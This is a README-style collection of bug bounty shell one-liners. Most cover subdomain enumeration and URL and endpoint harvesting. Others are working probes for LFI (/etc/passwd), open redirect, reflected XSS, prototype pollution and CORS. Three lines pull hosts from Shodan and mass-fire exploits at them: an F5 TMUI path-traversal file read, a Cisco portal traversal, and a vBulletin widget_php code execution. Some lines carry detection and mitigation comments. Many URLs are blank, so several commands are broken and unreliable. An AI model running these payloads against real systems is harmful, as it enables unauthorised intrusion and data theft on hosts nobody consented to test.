Awesome One-liner Bug Bounty


Bug Bounty

A collection of awesome one-liner scripts, especially useful as bug bounty tips.

This repository stores and houses various one-liners for bug bounty tips, provided by me as well as contributed by the community. Your contributions and suggestions are heartily welcome.

Local File Inclusion


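# Local file inclusion check: put /etc/passwd into every archived query parameter of
# domain.tld and flag responses that contain a passwd-style "root:x" entry.
# The URL is handed to the inner shell as the positional argument $1 instead of being
# spliced into the sh -c script text. gau returns third-party archive data, and a URL
# containing quotes, backticks or $(...) would otherwise be executed as a command on the
# machine running this pipeline.
# A "root:x" hit only shows that the string appeared in the response; confirm it by hand.
gau domain.tld | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "$1" 2>&1 | grep -q "root:x" && echo "VULN! $1"' _ %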



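# Redirect check: replace every query value of the archived URLs for the domain in $1 with
# $LHOST and flag URLs whose response carries a Location header pointing at $LHOST.
# The outer "$1" is the domain given to this one-liner; the "$1" inside the single-quoted
# sh -c script is the URL supplied by xargs. Passing the URL as an argument keeps archive
# data out of the script text, so a URL containing quotes, backticks or $(...) cannot run
# as a command on the operator's machine.
# LHOST is exported so the inner shell can expand it.
# The grep is case-sensitive and treats $LHOST as a regular expression: a lower-case
# "location:" header is not matched, and "." in LHOST matches any character.
export LHOST="http://localhost"; gau "$1" | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "$1" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! $1"' _ %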


cat waybackurl.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy -sk > /dev/null



gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt


 waybackurls | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b pipe > output.txt

Prototype Pollution


subfinder -d -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"



# Takes host:port pairs from a Shodan favicon-hash search, requests /etc/passwd through
# the "/tmui/login.jsp/..;/" path on each one, and prints a verdict per host.
# Detection: the request line is distinctive. A "..;/" segment directly after
# /tmui/login.jsp, followed by fileRead.jsp?fileName=..., can be searched for as a literal
# string in web-server, proxy and WAF logs.
# Mitigation on the server side is vendor patching and keeping the management UI
# unreachable from untrusted networks.
# "grep -q root" passes on any body that contains the word "root" (an error page, for
# instance), so a "Vulnerable" line is not proof that the file was read.
# "read host do" reads into two variables named host and do; the loop keyword is the
# "do" after the semicolon. $host is placed inside the printf format string, and the
# colour escape is never reset.
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done



# For each host in domain_list.txt, requests /+CSCOT+/translation-table with textdomain
# set to /+CSCOE+/portal_inc.lua (%2b is an encoded "+") and lang=../, then reports
# VULNERABLE when the first lines of the response contain "Cisco".
# Detection: look in web and VPN-portal logs for translation-table requests whose query
# string combines a textdomain path with "lang=../"; the traversal in the lang parameter
# is the distinctive part.
# The "Cisco" match is a loose heuristic; any page mentioning the vendor name passes.
# GREEN, RED and NC are not defined in this line, so they must be set beforehand or the
# labels print without colour. curl -k skips certificate verification.
while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < domain_list.txt

vBulletin 5.6.2 – ‘widget_tabbedContainer_tab_panel’ Remote Code Execution


# Takes host:port pairs from a Shodan favicon-hash search and POSTs to
# /ajax/render/widget_tabbedcontainer_tab_panel, asking the widget_php template to run
# phpinfo(); a host is marked when the reply contains the string "phpinfo".
# Detection: POST requests to that path whose body contains
# "subWidgets[0][template]=widget_php" or a "subWidgets[0][config][code]" field are
# distinctive and can be searched for in web-server and WAF logs.
# Mitigation is upgrading past the affected release named in the heading.
# The grep matches the bare word "phpinfo", which is also present when a server merely
# echoes the request back, so a hit needs manual confirmation.
# The request is sent over plain http, $host is unquoted in the URL, and $host is placed
# inside the printf format string.
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

Find JS Files


assetfinder | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done

Extract Endpoints from JS File


# List the unique double-quoted absolute paths ("/...") that appear in main.js.
# Only letters, digits and _ / ? = & are accepted between the quotes, so a path that
# contains any other character (".", "-", "%", ...) is skipped entirely rather than
# truncated.
# Each match has exactly one leading and one trailing quote, so deleting every quote
# character leaves just the path.
grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" main.js | tr -d '"' | sort -u

Get CIDR & Orgz from Target Lists


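# For each domain in domains.txt, resolve its A records and print the CIDR and
# Organization lines that whois reports for every returned address, one output line per
# domain.
# Domains are read line by line, not word-split from $(cat ...), so a stray glob
# character or space in the list cannot expand into something else.
while IFS= read -r DOMAIN; do
  # Skip blank lines; an empty name would make dig query the root zone.
  [ -n "$DOMAIN" ] || continue
  # The outer $(...) is left unquoted on purpose: echo then joins the per-address results
  # onto a single line. "dig +short" may also print CNAME targets, which whois receives
  # as-is.
  echo $(for ip in $(dig a "$DOMAIN" +short); do whois "$ip" | grep -e "CIDR\|Organization" | tr -s " " | paste - -; done | uniq)
done < domains.txt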

Get Subdomains from


curl -s "$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

Get Subdomains from


curl -s |jq -r .FDNS_A[]|cut -d',' -f2|sort -u


curl "$DOMAIN" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$DOMAIN"

Get Subdomains from


curl -s "" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from VirusTotal


curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomain with cyberxplore


curl -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+"

Get Subdomains from CertSpotter


curl -s "" | jq .[].dns_names | tr -d '[]"\n ' | tr ',' '\n'

Get Subdomains from Archive


curl -s "**&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

Get Subdomains from JLDC


curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from securitytrails


curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep "" | sort -u

Bruteforcing subdomain using DNS Over


while read sub;do echo "$" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep "" | sort -u ; done < wordlists.txt

Get Subdomains With


curl --silent | grep -oE "[a-zA-Z0-9._-]+\" | sort -u 

Get Subdomains With


curl --silent -X POST -d "" | grep -oE "[a-zA-Z0-9._-]+\" | sort -u 

Get Subdomains from


curl -s "$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Sort & Tested Domains from


curl "" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u |httpx -silent

Subdomain Bruteforcer with FFUF


ffuf -u https://FUZZ.rootdomain -w jhaddixall.txt -v | grep "| URL |" | awk '{print $4}'

Find All Allocated IP ranges for ASN given an IP address

whois -h -i origin -T route $(whois -h $1 | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

Extract IPs from a File


# Print every IPv4-looking token in file.txt (four dot-separated octets, each 0-255),
# one per line.
# The pattern has no boundary anchors, so a match can be carved out of a longer run of
# digits or a dotted version string ("1234.1.1.1" yields "234.1.1.1"). Review the output
# before using it as an indicator or block list.
grep -o -E -e '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt

Ports Scan without CloudFlare


subfinder -silent -d | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe

Create Custom Wordlists


gau| unfurl -u keys | tee -a wordlist.txt ; gau | unfurl -u paths|tee -a ends.txt; sed 's#/#\n#g' ends.txt  | sort -u | tee -a wordlist.txt | sort -u ;rm ends.txt  | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' wordlist.txt
cat domains.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a words.txt  

Extract Juicy Information

@Prial Islam Khan

for sub in $(cat domains.txt);do /usr/bin/gron "$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq |egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a file.txt  ;done

Find Subdomains TakeOver


subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/ -v 3 >> takeover ; 

Get multiple target’s Custom URLs from ParamSpider


cat domains | xargs -I % python3 ~/tool/ParamSpider/ -l high -o ./spidering/paramspider/% -d % ;

URLs Probing with cURL + Parallel


# Request every URL listed in alive-subdomains.txt, 50 at a time, and print one summary
# line per URL: HTTP status, downloaded size and the effective URL. Bodies are discarded.
# parallel appends each input line as the final curl argument; -q keeps the -w format
# string quoted when it is passed through.
# -k turns off TLS certificate verification, so the status and size can come from
# whatever endpoint answered, not necessarily the genuine host.
parallel -j50 -q curl -sk -o /dev/null -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' < alive-subdomains.txt

Dump In-scope Assets from chaos-bugbounty-list


curl -sL | jq -r '.programs[].domains | to_entries | .[].value'

Dump In-scope Assets from bounty-targets-data


HackerOne Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'

BugCrowd Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Intigriti Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'

YesWeHack Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

HackenProof Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'

Federacy Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Get all the urls out of a sitemap.xml


curl -s | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

Pure bash Linkfinder


curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt

Extract Endpoints from swagger.json


curl -s https://domain.tld/v2/swagger.json | jq '.paths | keys[]'

CORS Misconfiguration


# Intended as a CORS check: request each archived URL of $site with a foreign Origin
# header and look for that origin being echoed back in the response headers.
# As written it cannot report a finding:
#  - site, the Origin header value and the grep pattern are all empty (the values appear
#    to have been lost from this copy);
#  - target=$(...) is an assignment on the left of a pipe, so it writes nothing to the
#    pipe, grep reads empty input, and the else branch runs for every URL;
#  - "[Potentional CORS Found]echo" is parsed as a command with arguments, not printed
#    as a label;
#  - $url is unquoted in the curl call.
# What to confirm by hand on a real finding: the response returns
# Access-Control-Allow-Origin equal to the supplied origin together with
# Access-Control-Allow-Credentials: true. The server-side fix is an explicit allow-list
# of origins in place of reflecting the request header.
site=""; gau "$site" | while read url;do target=$(curl -s -I -H "Origin:" -X GET $url) | if grep ''; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

Find Hidden Servers and/or Admin Panels


ffuf -c -u https://target .com -H "Host: FUZZ" -w vhost_wordlist.txt 

Recon using


curl -s -w "\n%{http_code}" | jg .[].domain

Find live host/domain/assets


subfinder -d -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

XSS without gf


# Replaces every query value of the incoming URLs with a script-tag marker, fetches each
# URL and greps the response body for the same marker.
# A literal match only shows that the value is reflected without encoding somewhere in
# the body. Whether a browser would run it depends on the surrounding context, the
# response Content-Type and any Content-Security-Policy, so each hit needs manual
# triage. The server-side fix is context-aware output encoding of the reflected parameter.
# waybackurls is given no domain here, neither as an argument nor on stdin.
# "read host do" reads into two variables named host and do; the loop keyword is the
# "do" after the semicolon. echo is called without -e, so "\033[0;31m" is printed
# literally by shells whose echo does not interpret backslash escapes.
waybackurls| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

Extract endpoints from APK files


apkurlgrep -a path/to/file.apk

Get Subdomains from IPs


python3 <target-ips.txt> > vhosts.txt



python -i list.txt -w 40

Removes duplicate URLs and parameter combinations


cat urls.txt |qsreplace -a

Gather domains from content-security-policy:


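# Collect the host names that https://$domain allows in its Content-Security-Policy
# response header.
# Headers are requested explicitly: -D - writes them to stdout and -o /dev/null discards
# the body. A single-dash "-silent" is not the same as --silent; curl parses it as the
# short-option cluster -s -i -l -e nt, which also sends "Referer: nt".
# Header names are case-insensitive, so the line is compared in lower case.
# Limits of the filter chain: tokens without a dot are dropped, and so is any token
# containing a character outside [A-Za-z0-9._-]. That means sources written with a scheme
# (https://host) are lost, because the token keeps its leading "//". Only the enforcing
# header is read; content-security-policy-report-only is not.
curl -s -D - -o /dev/null "https://$domain" | awk 'tolower($0) ~ /^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" | sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u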